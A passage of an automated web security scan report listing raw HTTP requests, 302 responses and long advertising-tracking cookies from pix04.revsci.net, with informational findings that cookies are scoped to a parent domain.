rsiPus_aQJL="MLsXrlcNJj5noAC3RjxwrYCq5maHIXqV3bcut8jbjWMvRZsh039NS3Rk1DZ9FWcoweu30/kjxwVsyPDJfdB85DH9528gOB025UpRMepjnWmU5D8TIKUOcYbjUmShQ76UQ8O2Id1QrZKunr/oSaJPGUD1M2FfXarUHY3vg8ahPcCT3+YklIOYYWeOEs39aYwMH1Oyzh1cKZm6xWlsnVQK5XeKBwp21ZZle9CNzTsixFNNBKikWDt9n8zOQLOr2R52VBJU62U2bbxqnBQOF3XxuZopXc4sH3ZB08xsgmPeROBLf/pw2JM4T3NBA05x3I7F7WbAB0dj8okxKlhf6fEgxEAZUbMqj6JGIl7P5CAOGFhnHbvUKII41lYc0UedLRqTrY9QebpHRhrHwF3JXBfRoX1F7IMaWwNeWtqQQPBmAEJqR7mpbUrQY5Up8y7EjtHaDOlM3vgpaWsAYiPLvByGKWPmS09u1hcRmQmwQx5N2i7SWd1s9xtLLuXK6F+6bv2iZ8qFE71HT1Kkl+hS/Lg8ZUDNNMYrZPbgIaodojTtwp2b3LGlPywHAt7VDW/DAZuseSIyU4XW5eFPyz1Y6yrhpERI2Vik8hEbsQ8B8v87bEW13Rt13SX+mcaYE5siAUoco0Vq0+dX7hBHmJpHm33cECAnbFJyK50UHkwzt+c2nKU6KGuxY/oigNYJTV/sTm1adr+u7qtftuRwvDTeycarJ5BVmeTth8ruRZ1LgSNT/fpZx8Q4MvMQduiArZ4nRHmKTuHSvs2hGnE7UjfV+u2IOo9ma1WP/A=="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkjytG2HRpKcZ9iWeqPjy9kUWtl6xHCau2KMfgIXcPB8e/BpyfjtTtphAROxiuC83s+lEsRUrjgTlU1Q6ETbocY99WQN8dgTYd2TIldE82taHLaxy+Nydj7bjxqRSEzydoNKcidj8e3cwbw247cKkh0bvF6cW05IwoxL3mn8eGwNjtE8wBzFJ246UcorTvpQmlUzFWkSAdzpSiAiPPsJIE8lbllqVolddNGM9UughUMVmJRRI4QxwiFiwtc6KIkleGTyQORbnreQFdhoy9tIXJDzDUrzQQPFg53TtcFU0IzSRyZT7Ysrwwl1bCknBlQyPjhUJ76l2w0sAMYL8wdNz8+XZcRcYKvvD/UrCKooUt/aj0R6J70YEugNGsaI/NdjyO0otwfzNbegXYLqm4kbsRDLCOaFswANa5kumj+Myz7WFxFbCzByPlnMLG/iRprYhnnkwcpoUb94vjivtXsRNU8sY+9nJ/GyK0btkNncXgdCWK6F6Oq130DYl7qVO7toWR/7nBkQRQIHLYme9RaVkdGxQWzXlbDG+28P2rHEEKz1Jjq3MinipUFDb/X+skn0RAc5T2sv30M4M6SF5um2GeWtPGlm5/Kb7BBThW/rN4hbbJoIkTzsbd8cjyEyF0/6eY8Ql2WYO/ugwtD3KZKjg5FVoYYefZZL5FOyh5daP5P/acL+xvjHz+q/GKm+7UEbKgyi9riSc6BmVdwLpaoKChjgmndfydm9Rp55qJhAVzniaZx4ZfHgIJVo9ZqKvelViCz7jBcU+V22aO+QATsHM3O7khIxKxUpkTaNd2kuV2SDDKynS7pV755LqyKqSMIL9wDkqmG7I+PrM991cy7UOrI9CvhRsR0dGASBwDlIzEsz74PHZLjOOmhUndtuC+D9t3Pq9su4Qx5Gs+t+I1W2txXTMTAcv2+R94m2kL+BDy7SPgGZGE0LncHJN7qYordxYyuPDkLDO+RTaY+dG9ss66V7iVeW1Vpey8S0+SwK+SzonThNqM/B2m/bV6ZSXYt/prvJB/MoIZP7SVL30KjWZ5/nCFvqlj310LdQdx0sQ7a5cozfA89Wdmx6jAkGQrp47QDxo74bzIxU7oFU3eB48wpYTTqzPon/N/QOCsyy2tlb0vJptzVJDknJSV4Q5JHz84YjU8xY+F+7133qycHPNZitpdKfZe0t1RvmPf+XiCaa8BsDly/gBuN8TvoXnO8CAEwaesRAiFwcVqRagT7jCCmYzHi3EpHSIU6iFVXHlFHEhbdShbrC6g1B1Dr34GmQRkEjan4C1Evhax4yYJfFg/As+UsUZxBW0pXt5DzJCs/6I4Jli5U0q36mqAAXwqUxTeVjFtUsmZcR5liY8B3SY9pZ48EVHSp+luF/CLoxOj2+gMyXe3zIStYnrdo0U="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_JXtz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOBcXIQT7v8flOljrAByA1W2ycLqLUl+VNv9A50qQeW0skFhBnmOmk8I5Sv5jpQhg/tbnjpu0a1vDJXD1SJv2fw+YUoCsZRmCQYyjnQFQDPVfiYLeSoPxDBs89GWWbRUoRZrPYPRzYFf2oW7z9E4935niTvO+hYyvUJ1hgkhKNykF+vhgAdnVcJkCktu6nmYMKYawYH1F/48MplqIWwcaLdWmaEzzHPwetIIU2lYlRvocFcE+RZ2KpcEJnk9101BB6NGfIYAUGf/yKhVW1rd/ZDn9tF6IOq3XVfpE1UhIXsqIP9rU/vRi3jLsRImkwZBivcGp6uHDI9lnS3GwAVu7gA7+d5DMTENqoZ/IjON1RXfKvGmZx7O7dX3bM7oI8Wg/OsXxqY64Gif4tiuIhz8bG+ZiX+KDAuOz5aK2J0cQmkR84AGfLehIEAxq0AsT+jJ2fUX+YD3zP8MYqW0OmWuqOzqFtMMqkLXF9NCF+8uaR1J+sGfts/J0sUMhJc5ZpqSnmGEDLBLgx962RquibuFY7j; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:01:07 GMT; Path=/
Set-Cookie: rtc_2MY1=MLvntzM1ZwprJ5GrFviWjmmgATvMNHGJjojTTrWSZIpIFNkgDw/K4gucx48Ansn8gFdhbSFjRTa6QTj/I+16qFvFR8txZ3XhW+h/MeB/oGJTuWd71KWU93xLd4iO2rbczqqb71ITWUbp6EX0wNdtopvMxVqaM1JqYfNKs97ZtBaRULM0PwDcs+nUakr6T4pQ6ZAhwqqC8M5QeQgL3Mwz/l/LO7TuRHS3DG/WEBaa4GMZypMTtieoEqNYKS5uaQdc9YsZ/I7stOdJLd7Hv2XYRUoNtaop227HsWyGbHxMn003mjucGc0mruqE+6DHP6brM6nM6x/tn7oZ2DjdBMJUOZiv9xqjlXnqcVjrB3kXcNTeDq09E5IMKoYrVJlZkK6uobYwka3tRmxkmifKh23k49KG9Bf6S2yRaNGnAYLK+zm7JATIxubd282sNX+n1154JTW43J8wLUy5/9w1/V1bn+LfnLjopCoy5O0KIgr5+yVcorYv+yTBZ8FhgCJA+Q8QvQjH/z6qkFkkgV2Pc0Qu8ePOuvk8qolmk5a5cRl/uMAl5d1L5fAWohFKLmeKHnIc1teXHxZ62z3xlAPoH3vSe3gvL1dmnj44UotfcgD9gjypLg/DU9uqsl/Rdd2M4KoI4aNAtW2PewAt7/uqPhIVZ2lA67g753Fs+YYdF+aGv8uJwGCyFeT/2FR7o49m55h8Gwxj243dmAFbzNMgnnyKGgxLPowo3XlGRBBhnfGcjmQaduyakw2Situk66TlalCm1TQvRzzJbNCx+dssYOfOQB0bbtJ2ntUVoY0/MWG+7X9mFMcU0K1YsXlTv3JLgSG9szKwKoXeXI5nGPmexJQamIZZRu75FQen7qI5XVSM/FyhyjLG6RJHjFKcgLVTWbop0qonwtOz+dRaa+XzimvUgmjE/LsOByg4WyNecM6WuqsLzQSwbwkJu6ayeu/z8NTC7c0uuc9GN4iMyZ0VRwyeREtwXmyzI9BFcLyZ3Rs4ivUj2RjCjvtSsNNRHe2053cF2Vi66vu8vK0TwhhQ+4nNefilYUbTA6wV1dbQtthV8yc5tkCS4xO8RM2JqwjJ+2RL0MnC0HJ4Sa9kFkqhq5GF29eaWIKbJnhrkHmZYVI20kuZatlwGXCzd05n7WE/cFig6PF+oHMyVEvg3H2Geqve6dtrbR5/nlqFYJUJmU1LO9t6E30Vexgt/OqPCKtq5Buy0heNFn43D/XEPUM075oPE41B7rGtcoZLDHSX5xusWqM7Xz3Yy0rj1w/OGBhEfzOXP0tA8vgBAjPNzEOqo9q4g3TV0zqIlK03g3UEsVsKd8lrYh6vves5TCqBe0HeDGyLF1ZryuAIiKWwjLAn92Tu49HaCCp5ZapUWKSIpxW6EBmQA4m6a+VSTrtsZqZKuqbIAMmb6Z5nlEJ0CvScdpzM8bELtNupCMCENC4+mcWsy8PXof63WNfpjPhyWcxL6XPwO+XIvL1yoRu187rFg4rnh0OUfdRdE7b+DsMlXGSWyiWEOb7KYoa7LZDfbPfYMXY=; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:01:07 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:01:06 GMT

12.27. http://pix04.revsci.net/K10145/a3/0/3/pg.302  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fproduct&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5EOhMHIMN9L9XlOlhjCqMTK6hyRPhgO8/StXBMiwvUtfk2+f8pQBVnH6C1XL1Gj8ORJBPU0K18kquspNa2xO16VkbVFmPmFED/ROfss5MyaTFfhDp+yuExR1/a/IX2Hsyr1RynCW3gOqnFCbXsrgMNvCjwrXqmW2SlkxMp41EdMh9G78sGWNa/7GgZLldatK42V74Yg88W1YkZYf4F9AsRF3ZJU9DT1GHinjto6CMfbUZHldNeJBI6Flkjn2aekrtvERgpwmTyxMruLCaTR9t2E+Hj4dpKoaF4RblayFT/zAnvz2zkNwTna5rE/qk7Q+LphTnobN4Hb4fOsR4xMJVxQOqMgY5elWxPq4MbAA4pr9NcZGvV75dLPsz196Bi/xLxZb8iUPsr91zpM4TgqyjuOtnP0lITIukH4pqFfI4PAuqIffOunVFSOU+KJNu9RTMJv3MjLvRTQKWMJzx4Q+yKHmJCBbAPelw0lKw7E1yBNbQD9fS9KaCUyagBuyoH/dxaWYFEq0KJmG+9Dj0/SQE7msZCu6fHMFzfqi; rtc_M6m_=MLvntzM1ZwprJ5GrFviWjmmgATvNNHGJjojTTrWSZIpIFNkYyjZfNBHlcl0kJ6zHfageWylXbP3wSCPbUS6YYjcsKmrQeOUqyKPcaGszTDTzIh7WtzP5n4+zmZZfmgT5lRj+VfPH65chCW295PBHTclwaYvz/SFH1bidheEC6ZRKt9SG9BW8wwNKY4bJJbonQFHtMUTJpFcuSZbz7kTJnxMUL5KgBaHzjRvnrX6SnFrrchfIM5yjshfapwcb2sNQzbZdjBfasru/cAyP1weNriyPKHNATEhqm48Frl0iQ58XID97HW4ZuelkytTr1rC/Y44WWirvX1n4YT+DONi0LYUryUMomW7rJigm4wWq4rIRbkjgSHhZCCWRyQUFwJAV1ID5hI+aJ6aazd6dtbfN39bi3YdtOqXFXtQA1oZ823p8bU8+95SiLREbVMj4r9fvguEqsb6ZiowiD0QHBR5O7YoGrQTtvt49OFBNALY6xCbDvCZRxcd3PwMbMHF9NmAkKTYba8V7HuVRswXCU8FcQcP/VnsVvebZKb0EM1g01x05ERxj/PWvJb23XMUlVENuV3UxjP7/ReTP933hW1beZhIpumclGw06TmVZf/liRMOjCGGidIRNLkCjxr+jn98gJ60DuWa/6oljSYreAox5hf34+wFu4UMrGRoDMmJA7LZ+pzg7HZsRUu2MzWjCkj/8ilLGHSmlL5arTBlslp16GZkGUbdCuQOVlFSnlI9osJ7qHROvOJZhg2kYof7dNriymTDR4d+g5uaoD9DKAtFuCds/Rc7xVtfeQw4QMbnaY4JllnOKqLPOynBZckcstz/Rie4b4P4ftC2ihuu+hh+tb4xtHsHXUPc4S4kcgMoYU6nDhAG17oc8hRuW5vnXQ8mjCFlmg1AikueTXuw9zaFzxcX2n/5AY6b/9CvUk2jTwvfrs1Zd70/ybVtROyX11nYzYcRFBDcu6y63yS0FvWxXhj23zJyQBUyORdmr8TZe9HKLARFqrE0WgqHy3o4bQOGiuinjnlQO6/Tb6EQqtbqScAcGbOoTuOrGyyrrkhQRvhGP5TddNjuCbLxdI6ExyfhSWnMD5gI9RRANVnvfKpeszlgkjMhHO+AI0RAg1Rnrb694FmmSVopIgyGRfYWjkynQNgJu2WFcRVxyqXdKIg1ngWoCjEvDaqGOV5o+mwsP0WqnIOmypaPth6VviROUBdBqnTYbQpKrGdRSH3Wfsh+/t6tYtduD74mjx0Xqm2pq08w5QcKeM1WKgDKkMJ+XdzqfOAnZd82pKBjE4ORwnukNbnOu7MSSwsL9SL6E1m6fnHLOzNMuGy01wnCq/XskooIWiGeIa++XVGFfQXf7PDHd/Ucx2loESlP3R+oaCchKLj4LZFp4NtIXHvyjIXyP99iHRNx2gZf2aM8ryFP+bp9W3EenSlOtdlCd6kjeE5ZKlRwWat6Qd7j1HhdXSiPKFMAZC/MR350YkTLr27YH04gcO6l0Dkc6qJlOHZIyA2wZYJbumg0oQqkm5O5bX8SVTYKyLJBZj57fPCUUFQ==; rsiPus_nlnh="MLsXrqMOLjproBAxuuKo7xC/v0lmTlecDqSiToO8phWAnpO+YSTKFqU3TDxxVRk18Y3VCTjL0ah6bV8hWqwKPejoJrdpYW+maSaE+SE+JYHAqw/wQUT1qX7wDv68KC/ogKITsb9dC8gdu0uA7sN+LTYfo6fDEvy97fr0sfCIWg/dl5X5uzDg9KOQN8uVmwRirSVhkHVm0KyQbnTUGsc2ZQvcAhR0xzocc/zo82+gM1RCIH+HSCGErtUUZc9RJCGEmtyJa50VtG6uhU13oDsoWTBcH+pKwA+EFmS5nr9l5tca9Gn0G15id7IFw3BzD4Tvch7eJWmhiUjCLEDfLl0gbdj+ckvbdlfP3VayclAOz29lDjEAIM7evWDsxAp95So743zgvTRtdCe4oiCVigVSbNlYtf2gls9w4/Rbe+tmpqScTnQCnaNQwIizICQvruNgmFH/6+lojkVGlNDz5Ky3rTgx4Lb7FGgQFqtNmVDkIrLBzE5vX3eGdFDbFFVsTp88ZqFbUCErpL3v70oO0vaq8n4dLXBDnlJvcS6JdnjRk9xkIe69ZW1oeNhnpjXeiCaYl4LhoNHPSyKqNQcopy21Lq6Fx65Ehc1L/Zo9a+T+ilMYjIAgks58mh41keirnpuezj6yRhV7JX2rrCEqT/hJNxX7y2JcARkB1nMRRB8Zj9SHmrYZ638tSYG3b90lhgWBLXv0LDarrDfBS1eszRzd+qY471tll+fm92jvMhKTIDlOLkVopd2x+0aEKBYWNNN3k3toyRwrKsE4hBORWYMZSTdPaYPOQ1UPnovWcZpohcny7FCN8FH6hqZu6WJ0bE7KXD9+iEBSpnGNcjuJ57gNCQUER3dnilXxUU035Ub31YKYngAcRd67M4oL+VtrIgTE1ftBWaJU5hTHGEe4Nz2Zci3y3xXI6G85vV5OQZPwMjZ5we4k3N9bf3L5Db5oz9FeCksBpZVkBjxTqBRYGfoO/jdzHDYmpioDH7T49AzUBkFAhbVGacpYyYl5p0wOriiZcw3ZFQoSD4yzLpEu3nFozzx0"; rsi_us_1000000="pUMlIz9DOAYU1O2WA3Nf1wgg9Tpj7P+Tw3jzv8rD7yvDmvWDQ0Y8a5KAq8B98fA1QmRNDddtH/dK+uIMHXn850oVpZ6hBQpRqWE9VPS5Xy7XGW2RoRccmRQldIeS8HXSTpZFxGDjrLBA6xGO31q5lEKg7q/Zqa3Eh3raYFPi2iq2P/WUJ8LzKuLWOFTjNfjCk/0VNg4UoWYInFurSNSQ+aUh/C47rdGNAf1Dg1oVK6qn87HdFN4KIp8qp25VM4TSqlPz6cg1zQD2GwFFfzhKwHp0kGxTZK6jX8ZnXISB8sXcy0D55JrXRUETl0uoI4QVbKEZF/5dx1gs9ptsf6SthAIG43IlegqXwtMLrqqpTk/JyFQ2StgdP9FYuRHDpLz+OHzUQh1vrm5xKjX3+Q640exxVIfbO5itfUNxo5BZqgcjww3GikxnYg5fSYMvW08WJalwrMzbnGLl0KXXJ46jOVLE0Rb0yvlFoNktRzKMye9waAvctfzuH9EHwibUfXt190PEJ4A+Sg0AcAp7kOwVeDkiN2MCb3r1WPXuHm3y8pbsO2binEZAAOMbMCz6CtX91Rgn2EzUAx81QjGglnztOuUFRFlI7kjMQeXLGKWBRZdSe6eYTB6Lnh18LdQ5agXYqBlP5eTr0pdews3C7wuHkSy+cjD2XlZOYEMXQn9PuBTSjNA/XlMSRQqc9WomgO0U1VW9Z7NS9+gZx4/DR1GwAkIBjPHU5AlJIaaxmJASLwvjIxrX5KW3zZGf/mjfA2cFyChzAGmctIpu+Vd7ARiWWqAIi6cgvytaV2BRdBlrXFkhSMrlmfawqiVLWJ+RfqZK7gaVrut3WnrJOVMXXqr7CtxUK6a2Pn/1EfyMPFJStSe6uI0JDgJOOUXIh0/QlT3bEiUUzklRDfiLQQg9qZceXx0I0CFus/5FTGi3aSsJ/iOmQ7U7lJyS2obs9TpltQ/ufeib9k1qvREJYFLBR0z5bFhcp5yzXQbaEFx8ymNOXnS1itZUINjWC8jdy5PsuUT+JDJXPtf/HEu1N4a99erdLdqPuj+ki8RVgjGf1QVPdRYQN5Ikpkk0MRA5SSlsc87Euf+syX6f0SaGqcOA+LMY28by9BOfF4CjwojIYLQA7CTMmShGLD7QIoYNPB9pH3S/WcquP8g8yavfDQBU+QwcMOiGx/GukIS2j/H4BDvCbywCrbiyLf0IsbRg+/vZyQlnl03yTrzUhfJGYADGtKLHujYIlWVJ2juevHA9vZrI2f0zNZZFT5Ox5BJBvBcQLenCuVaRyx9ZwQYz5yUzskZStzZiHbYlVsH1sWxuxzg1xSosd3Tq17MFdy1sDZD30OeKip7ei44DiArBocEjjeNpiyKtXSdt7rrwtwl36hGrMTrfhX6+/bn0kr2hGgVBE+oKtf3pVCXZqMHah6gq1RieAs/KWLv+Kc38x5h3OOZj9/KY5a5+y4Drg4l7b9rJsCgZP8zktKSaeNFEIDZ35+CtVymuq0xkEBJifIs="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_M6m_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP15E+huAIMpqaIQFMFwqim7rCI4rfK4iOHXhPolbdVqa7OUicFRaeJooUUZKyvzikWBlKU5VPLQhd3sPpP+0bvuYvT98yo6AuyG3zQot2ZK0rTT30MK82st/RhmDz/ynmLnjPA+8089Bzyp5vs77iuejNIG9ygzsHCFJY+P81pzuk/HxbRgvnq9urCwUbMCth/V3AYpdEqSYeZGw6pxnXtNNBAZ8JLeSlhXSVTnS8dAWAbvCG+nKrTQa1XxQuzEzgppHoc8Q8I5hkczyahzaR92FZ4qGkwlZwA2pipdFjJAmhUE4MsVQEk4W0nbCBX2i7fX3JDKc9vHnLHUuAmS/QaXr94ukCj5eKXLr3Lmhr571kb++2iCayqULCMbD3m4M+HnM2t1F/kiuAk1UGrDaLKBTCS9lbs21J8FGflcdpaPRMrVSAACvGqhmisugCNTMif6i/V+qPvLFTUP0KqaTYxC7SM/mPkyDILNutxgcsfziGsJZLw6LREx7KzvLvx+LJUJzmAGMuYz/181rxvedutesb6ow==; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:17:48 GMT; Path=/
Set-Cookie: rtc_DsnD=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:17:48 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:17:48 GMT

12.28. http://pix04.revsci.net/K10145/a3/0/3/pg.302  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fshoppingbasket&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305609&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
